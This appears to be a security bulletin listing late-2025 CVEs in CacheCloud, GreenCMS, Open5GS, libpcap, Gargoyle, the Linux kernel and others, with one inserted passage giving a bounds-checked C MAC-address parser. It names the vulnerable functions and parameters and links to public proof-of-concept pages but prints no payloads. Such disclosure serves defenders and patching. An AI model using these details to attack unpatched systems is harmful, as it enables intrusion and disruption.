| SohuTV--CacheCloud | A vulnerability was identified in SohuTV CacheCloud up to 3.2.0. This affects the function index of the file src/main/java/com/sohu/cache/web/controller/ServerController.java. The manipulation leads to cross site scripting. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15171 | VDB-338556 | SohuTV CacheCloud ServerController.java index cross site scripting VDB-338556 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716304 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/367 https://github.com/sohutv/cachecloud/issues/367#issue-3733551662 |
| SohuTV--CacheCloud | A security flaw has been discovered in SohuTV CacheCloud up to 3.2.0. This impacts the function preview of the file src/main/java/com/sohu/cache/web/controller/RedisConfigTemplateController.java. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15172 | VDB-338557 | SohuTV CacheCloud RedisConfigTemplateController.java preview cross site scripting VDB-338557 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716306 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/368 https://github.com/sohutv/cachecloud/issues/368#issue-3733556724 |
| SohuTV--CacheCloud | A weakness has been identified in SohuTV CacheCloud up to 3.2.0. Affected is the function advancedAnalysis of the file src/main/java/com/sohu/cache/web/controller/InstanceController.java. This manipulation causes cross site scripting. The attack can be carried out remotely. The exploit has been made available to the public and could be exploited. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15173 | VDB-338558 | SohuTV CacheCloud InstanceController.java advancedAnalysis cross site scripting VDB-338558 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716307 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/369 https://github.com/sohutv/cachecloud/issues/369#issue-3733560985 |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this vulnerability is the function doAppAuditList of the file src/main/java/com/sohu/cache/web/controller/AppManageController.java. Such manipulation leads to cross site scripting. The attack may be performed remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15174 | VDB-338559 | SohuTV CacheCloud AppManageController.java doAppAuditList cross site scripting VDB-338559 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716308 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/370 https://github.com/sohutv/cachecloud/issues/370#issue-3733566371 |
| SohuTV--CacheCloud | A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doAppList/appCommandAnalysis of the file src/main/java/com/sohu/cache/web/controller/AppController.java. Performing manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15175 | VDB-338560 | SohuTV CacheCloud AppController.java appCommandAnalysis cross site scripting VDB-338560 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716309 | SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716322 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/371 https://github.com/sohutv/cachecloud/issues/381 |
| n/a--GreenCMS | A vulnerability was found in GreenCMS up to 2.3. This affects an unknown part of the file /DataController.class.php of the component File Handler. Performing manipulation of the argument sqlFiles/zipFiles results in path traversal. The attack can be initiated remotely. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-29 | 3.8 | CVE-2025-15187 | VDB-338572 | GreenCMS File DataController.class.php path traversal VDB-338572 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721387 | https://github.com/GreenCMS/GreenCMS Greencms v2.3 Arbitrary File Removal Submit #724836 | https://github.com/GreenCMS/GreenCMS Greencms V2.3 Arbitrary File Removal (Duplicate) Submit #725143 | Greencms https://github.com/GreenCMS/GreenCMS V2.3 arbitrary file deletion (Duplicate) https://github.com/ueh1013/VULN/issues/4 https://github.com/ueh1013/VULN/issues/5 |
| SohuTV--CacheCloud | A flaw has been found in SohuTV CacheCloud up to 3.2.0. The impacted element is the function redirectNoPower of the file src/main/java/com/sohu/cache/web/controller/WebResourceController.java. This manipulation causes cross site scripting. The attack can be carried out remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-29 | 3.5 | CVE-2025-15201 | VDB-338588 | SohuTV CacheCloud WebResourceController.java redirectNoPower cross site scripting VDB-338588 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716312 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/373 |
| SohuTV--CacheCloud | A security vulnerability has been detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doMachineList/doPodList of the file src/main/java/com/sohu/cache/web/controller/MachineManageController.java. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15219 | VDB-338604 | SohuTV CacheCloud MachineManageController.java doPodList cross site scripting VDB-338604 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716318 | SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716319 | SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/377 https://github.com/sohutv/cachecloud/issues/378 |
| SohuTV--CacheCloud | A flaw has been found in SohuTV CacheCloud up to 3.2.0. This vulnerability affects the function index of the file src/main/java/com/sohu/cache/web/controller/AppDataMigrateController.java. This manipulation causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15221 | VDB-338606 | SohuTV CacheCloud AppDataMigrateController.java index cross site scripting VDB-338606 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #716321 | SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/380 |
| CloudPanel--Community Edition | A security vulnerability has been detected in CloudPanel Community Edition up to 2.5.1. The affected element is an unknown function of the file /admin/users of the component HTTP Header Handler. Such manipulation of the argument Referer leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.5.2 is sufficient to fix this issue. Upgrading the affected component is recommended. | 2025-12-30 | 3.5 | CVE-2025-15241 | VDB-338631 | CloudPanel Community Edition HTTP Header users redirect VDB-338631 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725543 | CloudPanel CloudPanel Community Edition 2.5.1 URL Redirection to Untrusted Site ('Open Redirect') https://github.com/Stolichnayer/cloudpanel-open-redirect https://github.com/Stolichnayer/cloudpanel-open-redirect?tab=readme-ov-file#%EF%B8%8F-steps-to-reproduce https://github.com/cloudpanel-io/cloudpanel-ce/releases/tag/v2.5.2 |
| n/a--PHPEMS | A vulnerability was detected in PHPEMS up to 11.0. The impacted element is an unknown function of the component Coupon Handler. Performing manipulation results in race condition. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitability is regarded as difficult. The exploit is now public and may be used. | 2025-12-30 | 3.1 | CVE-2025-15242 | VDB-338632 | PHPEMS Coupon race condition VDB-338632 | CTI Indicators (IOB, IOC) Submit #725661 | PHPEMS <=11.0 Race Condition https://byebydoggy.github.io/post/2025/1229-phpems-coupon-recharge-race-condition-poc/ |
| n/a--PHPEMS | A vulnerability has been found in PHPEMS up to 11.0. This impacts an unknown function of the component Purchase Request Handler. The manipulation leads to race condition. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 3.7 | CVE-2025-15244 | VDB-338634 | PHPEMS Purchase Request race condition VDB-338634 | CTI Indicators (IOB, IOC) Submit #725727 | PHPEMS <=11.0 Race Condition https://byebydoggy.github.io/post/2025/1229-phpems-points-race-condition-poc/ |
| D-Link--DCS-850L | A vulnerability was found in D-Link DCS-850L 1.02.09. Affected is the function uploadfirmware of the component Firmware Update Service. The manipulation of the argument DownloadFile results in path traversal. The attack must originate from the local network. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 3.5 | CVE-2025-15245 | VDB-338635 | D-Link DCS-850L Firmware Update Service uploadfirmware path traversal VDB-338635 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725742 | D-Link DCS850L v1.02.09 Absolute Path Traversal https://tzh00203.notion.site/D-Link-DCS850L-v1-02-09-Path-Traversal-Vulnerability-in-Firmware-Update-2d8b5c52018a803abbc7e30e2858d084?source=copy_link https://www.dlink.com/ |
| sunhailin12315--product-review | A security flaw has been discovered in sunhailin12315 product-review 商品评价系统 up to 91ead6890b4065bb45b7602d0d73348e75cb4639. This affects an unknown part of the component Write a Review. Performing manipulation of the argument content results in cross site scripting. The attack can be carried out remotely. The exploit has been released to the public and may be exploited. This product adopts a rolling release strategy to maintain continuous delivery. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15248 | VDB-338638 | sunhailin12315 product-review 商品评价系统 Write a Review cross site scripting VDB-338638 | CTI Indicators (IOB, IOC, TTP, IOA) https://gitee.com/sunhailin12315/product-review/issues/ICK775 |
| zhujunliang3--work_platform | A weakness has been identified in zhujunliang3 work_platform up to 6bc5a50bb527ce27f7906d11ea6ec139beb79c31. This vulnerability affects unknown code of the component Content Handler. Executing manipulation can lead to cross site scripting. The attack may be performed remotely. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-30 | 3.5 | CVE-2025-15249 | VDB-338639 | zhujunliang3 work_platform Content cross site scripting VDB-338639 | CTI Indicators (IOB, IOC, TTP) https://gitee.com/zhujunliang3/work_platform/issues/ICLUJ2 |
| Edimax--BR-6208AC | A weakness has been identified in Edimax BR-6208AC 1.02/1.03. Affected by this issue is the function formALGSetup of the file /goform/formALGSetup of the component Web-based Configuration Interface. This manipulation of the argument wlan-url causes open redirect. The attack can be carried out remotely. The exploit has been made available to the public and could be exploited. Edimax confirms this issue: "The product mentioned, EDIMAX BR-6208AC V2, has reached its End of Life (EOL) status. It is no longer supported or maintained by Edimax, and it is no longer available for purchase in the market. Consequently, there will be no further firmware updates or patches for this device. We recommend users upgrade to newer models for better security." This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-30 | 3.5 | CVE-2025-15258 | VDB-338648 | Edimax BR-6208AC Web-based Configuration formALGSetup redirect VDB-338648 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722446 | Edimax BR-6208AC V2_1.02 Open Redirect https://tzh00203.notion.site/EDIMAX-BR-6208AC-V2_1-02-Open-Redirect-Vulnerability-in-Web-formALGSetup-handler-2d3b5c52018a80188e9ae30d3cc8c3d1?source=copy_link |
| n/a--EyouCMS | A vulnerability was detected in EyouCMS up to 1.7.7. The affected element is an unknown function of the file application/home/model/Ask.php of the component Ask Module. Performing manipulation of the argument content results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 3.5 | CVE-2025-15374 | VDB-339082 | EyouCMS Ask Module Ask.php cross site scripting VDB-339082 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718480 | EyouCMS 1.7.7 Cross Site Scripting https://note-hxlab.wetolink.com/share/LNickWiRaFiF https://note-hxlab.wetolink.com/share/LNickWiRaFiF#-span--strong-proof-of-concept---strong---span- |
| Uasoft--badaso | A security vulnerability has been detected in Uasoft badaso up to 2.9.7. Affected is the function forgetPassword of the file src/Controllers/BadasoAuthController.php of the component Token Handler. Such manipulation leads to weak password recovery. The attack can be executed remotely. This attack is characterized by high complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 3.7 | CVE-2025-15398 | VDB-339207 | Uasoft badaso Token BadasoAuthController.php forgetPassword password recovery VDB-339207 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #720129 | badaso 2.9.7 Cryptographically Weak PRNG https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq https://note-hxlab.wetolink.com/share/HG1CWbb7FVnq#-span--strong-step-1--trigger-password-reset-for-victim--strong---span- |
| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. Such manipulation leads to denial of service. The attack must be carried out locally. The exploit is publicly available and might be used. The name of the patch is 465273d13ba5d47b274c38c9d1b07f04859178a1. A patch should be applied to remediate this issue. | 2026-01-01 | 3.3 | CVE-2025-15417 | VDB-339339 | Open5GS GTPv2-C F-TEID s11-handler.c sgwc_s11_handle_create_session_request denial of service VDB-339339 | CTI Indicators (IOB, IOC, IOA) Submit #727616 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4203 https://github.com/open5gs/open5gs/issues/4203#issuecomment-3681643498 https://github.com/open5gs/open5gs/issues/4203#issue-3719257558 https://github.com/open5gs/open5gs/commit/465273d13ba5d47b274c38c9d1b07f04859178a1 |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c of the component Bearer QoS IE Length Handler. Performing manipulation results in denial of service. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. The patch is named 4e913d21f2c032b187815f063dbab5ebe65fe83a. To fix this issue, it is recommended to deploy a patch. | 2026-01-01 | 3.3 | CVE-2025-15418 | VDB-339340 | Open5GS Bearer QoS IE Length types.c ogs_gtp2_parse_bearer_qos denial of service VDB-339340 | CTI Indicators (IOB, IOC, IOA) Submit #728043 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4217 https://github.com/open5gs/open5gs/issues/4217#issuecomment-3690767105 https://github.com/open5gs/open5gs/issues/4217#issue-3759615968 https://github.com/open5gs/open5gs/commit/4e913d21f2c032b187815f063dbab5ebe65fe83a |
| n/a--Open5GS | A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. Executing a manipulation can lead to denial of service. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. This patch is called 5aaa09907e7b9e0a326265a5f08d56f54280b5f2. It is advisable to implement a patch to correct this issue. | 2026-01-02 | 3.3 | CVE-2025-15419 | VDB-339341 | Open5GS GTPv2-C Flow s5c-handler.c sgwc_s5c_handle_create_session_response denial of service VDB-339341 | CTI Indicators (IOB, IOC, IOA) Submit #728044 | Open5GS SGWC v2.7.6 Denial of Service https://github.com/open5gs/open5gs/issues/4224 https://github.com/open5gs/open5gs/issues/4224#issuecomment-3698521008 https://github.com/open5gs/open5gs/issues/4224#issue-3766767406 https://github.com/open5gs/open5gs/commit/5aaa09907e7b9e0a326265a5f08d56f54280b5f2 |
| n/a--LigeroSmart | A vulnerability was found in LigeroSmart up to 6.1.24. This affects an unknown part of the component Environment Variable Handler. Performing manipulation of the argument REQUEST_URI results in cross site scripting. The attack may be initiated remotely. The exploit has been made public and could be used. Upgrading to version 6.1.26 and 6.3 is able to mitigate this issue. The patch is named 264ac5b2be5b3c673ebd8cb862e673f5d300d9a7. The affected component should be upgraded. | 2026-01-02 | 3.5 | CVE-2025-15437 | VDB-339364 | LigeroSmart Environment Variable cross site scripting VDB-339364 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #729021 | LigeroSmart 6.1.24 Cross Site Scripting https://github.com/LigeroSmart/ligerosmart/issues/278 https://github.com/LigeroSmart/ligerosmart/issues/278#issuecomment-3675129508 https://github.com/LigeroSmart/ligerosmart/commit/264ac5b2be5b3c673ebd8cb862e673f5d300d9a7 https://github.com/LigeroSmart/ligerosmart/releases/tag/6.1.26 |
| KDE--messagelib | KDE messagelib before 25.11.90 ignores SSL errors for threatMatches:find in the Google Safe Browsing Lookup API (aka phishing API), which might allow spoofing of threat data. NOTE: this Lookup API is not contacted in the messagelib default configuration. | 2025-12-31 | 3.4 | CVE-2025-69412 | https://github.com/KDE/messagelib/compare/v25.11.80...v25.11.90 https://github.com/KDE/messagelib/commit/01adef0482bb3d5c817433db5208620c84a992b3 https://developers.google.com/safe-browsing/v4 https://developers.google.com/safe-browsing/v4/lookup-api |
| Campcodes--Complete Online Beauty Parlor Management System | A cross-site scripting vulnerability was determined in Campcodes Complete Online Beauty Parlor Management System 1.0, in unspecified code of the file /admin/search-invoices.php. Manipulation of the argument searchdata triggers the issue. The attack can be launched remotely. A public exploit is available. | 2025-12-29 | 2.4 | CVE-2025-15188 | VDB-338573; Campcodes Complete Online Beauty Parlor Management System search-invoices.php cross site scripting VDB-338573; CTI Indicators (IOB, IOC, TTP, IOA) Submit #721868; campcodes Complete Online Beauty Parlor Management System V1.0 Cross Site Scripting https://github.com/BUPT2025201/CVE/issues/1 https://www.campcodes.com/ |
| SohuTV--CacheCloud | A reflected cross-site scripting vulnerability was detected in SohuTV CacheCloud up to 3.2.0, in the functions getExceptionStatisticsByClient/getCommandStatisticsByClient/doIndex of the file src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java. The attack can be executed remotely. A public exploit is available. The project was informed of the problem early through an issue report but has not responded. | 2025-12-29 | 2.4 | CVE-2025-15200 | VDB-338587; SohuTV CacheCloud AppClientDataShowController.java doIndex cross site scripting VDB-338587; CTI Indicators (IOB, IOC, TTP, IOA) Submit #716311; SohuTV CacheCloud <=3.2.0 Reflected XSS Submit #716323; SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) Submit #716324; SohuTV CacheCloud <=3.2.0 Reflected XSS (Duplicate) https://github.com/sohutv/cachecloud/issues/372 https://github.com/sohutv/cachecloud/issues/382 |
| SohuTV--CacheCloud | A reflected cross-site scripting vulnerability has been found in SohuTV CacheCloud up to 3.2.0, in the function taskQueueList of the file src/main/java/com/sohu/cache/web/controller/TaskController.java. The attack can be performed remotely. A public exploit is available. The project was informed of the problem early through an issue report but has not responded. | 2025-12-29 | 2.4 | CVE-2025-15202 | VDB-338589; SohuTV CacheCloud TaskController.java taskQueueList cross site scripting VDB-338589; CTI Indicators (IOB, IOC, TTP, IOA) Submit #716313; SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/374 |
| SohuTV--CacheCloud | A reflected cross-site scripting vulnerability was found in SohuTV CacheCloud up to 3.2.0, in the function index of the file src/main/java/com/sohu/cache/web/controller/ResourceController.java. The attack can be initiated remotely. A public exploit is available. The project was informed of the problem early through an issue report but has not responded. | 2025-12-29 | 2.4 | CVE-2025-15203 | VDB-338590; SohuTV CacheCloud ResourceController.java index cross site scripting VDB-338590; CTI Indicators (IOB, IOC, TTP, IOA) Submit #716314; SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/375 |
| SohuTV--CacheCloud | A reflected cross-site scripting vulnerability was determined in SohuTV CacheCloud up to 3.2.0, in the function doQuartzList of the file src/main/java/com/sohu/cache/web/controller/QuartzManageController.java. The attack can be launched remotely. A public exploit is available. The project was informed of the problem early through an issue report but has not responded. | 2025-12-29 | 2.4 | CVE-2025-15204 | VDB-338591; SohuTV CacheCloud QuartzManageController.java doQuartzList cross site scripting VDB-338591; CTI Indicators (IOB, IOC, TTP, IOA) Submit #716315; SohuTV CacheCloud <=3.2.0 Reflected XSS https://github.com/sohutv/cachecloud/issues/376 |
| Campcodes--Park Ticketing System | A cross-site scripting vulnerability was found in Campcodes Park Ticketing System 1.0, in the function save_pricing of the file admin_class.php. Manipulation of the argument name/ride triggers the issue. The attack can be performed remotely. A public exploit is available. | 2025-12-30 | 2.4 | CVE-2025-15214 | VDB-338599; Campcodes Park Ticketing System admin_class.php save_pricing cross site scripting VDB-338599; CTI Indicators (IOB, IOC, TTP, IOA) Submit #725104; Campcodes Park Ticketing System v1.0 XSS Submit #728898; campcodes Park Ticketing System V1.0 Cross Site Scripting (Duplicate) https://github.com/dobkill/CVE/issues/2 https://www.campcodes.com/ |
| youlaitech--vue3-element-admin | A cross-site scripting vulnerability has been identified in youlaitech vue3-element-admin up to 3.4.0, in unspecified processing of the file src/views/system/notice/index.vue of the Notice Handler component. The attack can be initiated remotely. A public exploit is available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 2.4 | CVE-2025-15372 | VDB-339080; youlaitech vue3-element-admin Notice index.vue cross site scripting VDB-339080; CTI Indicators (IOB, IOC, TTP, IOA) Submit #718345; youlaitech vue3-element-admin <=v3.4.0 XSS https://github.com/AnalogyC0de/public_exp/blob/main/archives/vue3-element-admin/report.md https://github.com/AnalogyC0de/public_exp/blob/main/archives/vue3-element-admin/report.md#proof-of-concept |
| xnx3--wangmarket | A cross-site scripting vulnerability was found in xnx3 wangmarket up to 6.4, in an unspecified function of the file /siteVar/save.do of the Add Global Variable Handler component. Manipulation of the argument Remark/Variable Value triggers the issue. The attack can be executed remotely. A public exploit is available. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-01 | 2.4 | CVE-2025-15416 | VDB-339337; xnx3 wangmarket Add Global Variable save.do cross site scripting VDB-339337; CTI Indicators (IOB, IOC, TTP, IOA) Submit #721080; xnx3 https://github.com/xnx3/wangmarket <=v6.4 Cross Site Scripting https://github.com/yuccun/CVE/blob/main/wangmarket-Stored_Cross-Site_Scripting.md |
| The Tcpdump Group--libpcap | pcap_ether_aton() is an auxiliary function in libpcap that takes a string argument and returns a fixed-size allocated buffer. The string argument must be a well-formed MAC-48 address in one of the supported formats, but this requirement has been poorly documented. If an application calls the function with an argument that deviates from the expected format, the function can read data beyond the end of the provided string and write data beyond the end of the allocated buffer. | 2025-12-31 | 1.9 | CVE-2025-11961 | https://github.com/the-tcpdump-group/libpcap/commit/b2d2f9a9a0581c40780bde509f7cc715920f1c02 |
| The Tcpdump Group--libpcap | On Windows only, if libpcap needs to convert a Windows error message to UTF-8 and the message includes characters that UTF-8 represents using 4 bytes, utf_16le_to_utf_8_truncated() can write data beyond the end of the provided buffer. | 2025-12-31 | 1.9 | CVE-2025-11964 | https://github.com/the-tcpdump-group/libpcap/commit/7fabf607f2319a36a0bd78444247180acb838e69 |
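
The libpcap entry for pcap_ether_aton() above describes the classic failure mode of a fixed-format parser: an input that deviates from the expected layout drives reads past the end of the string and writes past the end of the output buffer. The following is an added example, my own code rather than libpcap's, and it does not reproduce the formats pcap_ether_aton() actually accepts (the page does not list them; the two separator styles below are an assumption). It shows a MAC-48 parser that validates before it writes: it reads six two-digit hex groups separated consistently by ':' or '-', stops at the string terminator, rejects trailing bytes, and returns an error instead of a partially filled or overrun buffer on anything malformed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAC48_LEN 6

/* Decode one hex digit; returns -1 for anything that is not [0-9A-Fa-f].
 * Called on the NUL terminator it also returns -1, which is what stops
 * the parser from reading past the end of a short string. */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/*
 * Parse a MAC-48 address written as six two-digit hex groups separated by
 * ':' or '-' (assumed formats, e.g. "00:11:22:aa:bb:cc") into out[6].
 * Returns 0 on success, -1 on any malformed input. No byte beyond the
 * terminator is read, and out[] is written only after the whole address
 * has validated, so a caller never sees a half-filled buffer.
 */
int mac48_parse(const char *s, uint8_t out[MAC48_LEN])
{
    uint8_t tmp[MAC48_LEN];
    char sep = 0;

    if (s == NULL)
        return -1;

    for (size_t i = 0; i < MAC48_LEN; i++) {
        /* s[1] is only read after s[0] proved to be a non-NUL hex digit. */
        int hi = hexval(s[0]);
        if (hi < 0) return -1;
        int lo = hexval(s[1]);
        if (lo < 0) return -1;
        tmp[i] = (uint8_t)((hi << 4) | lo);
        s += 2;

        if (i == MAC48_LEN - 1)
            break;

        /* Separator: ':' or '-', and the same one between every group. */
        if (*s != ':' && *s != '-')
            return -1;
        if (sep == 0)
            sep = *s;
        else if (*s != sep)
            return -1;
        s++;
    }

    /* Anything after the sixth group ("...:cc:dd", "...:ccxyz") is rejected. */
    if (*s != '\0')
        return -1;

    memcpy(out, tmp, MAC48_LEN);
    return 0;
}

/*
 * Allocating variant with the same contract as a "return a fixed-size
 * buffer" helper: exactly MAC48_LEN bytes on success, NULL if the string is
 * malformed or allocation fails. The caller frees the result. Returning
 * NULL is the safe replacement for writing past a fixed-size buffer.
 */
uint8_t *mac48_aton(const char *s)
{
    uint8_t *buf = malloc(MAC48_LEN);
    if (buf == NULL)
        return NULL;
    if (mac48_parse(s, buf) != 0) {
        free(buf);
        return NULL;
    }
    return buf;
}

int main(void)
{
    /* Constructed inputs: two valid spellings and several malformed ones. */
    const char *inputs[] = {
        "00:11:22:aa:bb:cc",
        "00-11-22-AA-BB-CC",
        "00:11:22:aa:bb",       /* too short: parser stops at the NUL     */
        "00:11:22:aa:bb:cc:dd", /* too long: trailing bytes are rejected  */
        "00:11-22:aa:bb:cc",    /* mixed separators                        */
        "0g:11:22:aa:bb:cc",    /* non-hex digit                           */
        "",
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        uint8_t *m = mac48_aton(inputs[i]);
        if (m) {
            printf("%-22s -> %02x:%02x:%02x:%02x:%02x:%02x\n", inputs[i],
                   m[0], m[1], m[2], m[3], m[4], m[5]);
            free(m);
        } else {
            printf("%-22s -> rejected\n", inputs[i]);
        }
    }
    return 0;
}
```

The design point is the order of operations: every read is gated on the previous byte being non-NUL, the output is staged in a local array, and the copy to the caller's buffer happens only once the full address has been accepted. A parser that writes as it goes, or that assumes the string is at least 17 bytes long, is exactly the shape the libpcap advisory warns about.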

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Gargoyle--Gargoyle Router Management Utility | Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the device, including unauthorized access to system files and execution of attacker-controlled commands. | 2025-12-31 | not yet calculated | CVE-2015-10145 | https://packetstorm.news/files/id/132149 https://www.gargoyle-router.com/ https://blog.xlab.qianxin.com/large-scale-botnet-airashi-en/ https://www.vulncheck.com/advisories/gargoyle-authenticated-os-command-execution-via-run-commands-sh |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mei: fix potential NULL-ptr deref after clone If cloning the SKB fails, don't try to use it, but rather return as if we should pass it. Coverity CID: 1503456 | 2025-12-30 | not yet calculated | CVE-2022-50784 | https://git.kernel.org/stable/c/8b8e25073f3dab93554ee3d5b264f7c013ebd92a https://git.kernel.org/stable/c/0183b7c49cfdda91284505cbcdc7feecde48cbb9 https://git.kernel.org/stable/c/d3df49dda431f7ae4132a9a0ac25a5134c04e812 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fsi: occ: Prevent use after free Use get_device and put_device in the open and close functions to make sure the device doesn't get freed while a file descriptor is open. Also, lock around the freeing of the device buffer and check the buffer before using it in the submit function. | 2025-12-30 | not yet calculated | CVE-2022-50785 | https://git.kernel.org/stable/c/1d5ad0a874ddfcee9f932f54b1d34cbe8b9ddcfe https://git.kernel.org/stable/c/3593e8efc9f0dac6be70bd5c964eadaa86bf2713 https://git.kernel.org/stable/c/d3e1e24604031b0d83b6c2d38f54eeea265cfcc0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: s5p-mfc: Clear workbit to handle error condition During error on CLOSE_INSTANCE command, ctx_work_bits was not getting cleared. During consequent mfc execution NULL pointer dereferencing of this context led to kernel panic. This patch fixes this issue by making sure to clear ctx_work_bits always. | 2025-12-30 | not yet calculated | CVE-2022-50786 | https://git.kernel.org/stable/c/12242bd13ce68acd571b2cce6ab302e154e8a4ee https://git.kernel.org/stable/c/640075400c7c577b0f5369b935e22a588773fafa https://git.kernel.org/stable/c/8ff64edf9d16e8c277dcc8189794763624e6b4b8 https://git.kernel.org/stable/c/ff27800c0a6d81571671b33f696109804d015409 https://git.kernel.org/stable/c/09c1fbbe532758e4046c20829f4c0c50b99332dc https://git.kernel.org/stable/c/bd1b72f0c39a0d791a087b4e643701a48328ba8e https://git.kernel.org/stable/c/d3f3c2fe54e30b0636496d842ffbb5ad3a547f9b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xhci: dbc: Fix memory leak in xhci_alloc_dbc() If DbC is already in use, then the allocated memory for the xhci_dbc struct doesn't get freed before returning NULL, which leads to a memleak. | 2025-12-30 | not yet calculated | CVE-2022-50809 | https://git.kernel.org/stable/c/103b459590e1eb4d80b02761eb36c7cae1d9b58e https://git.kernel.org/stable/c/116d6a6964986ea7eb516daa36128d270f1f248d https://git.kernel.org/stable/c/69e67c804d09a6b1bcda1f4f242f151f813eeb4a https://git.kernel.org/stable/c/d591b32e519603524a35b172156db71df9116902 |
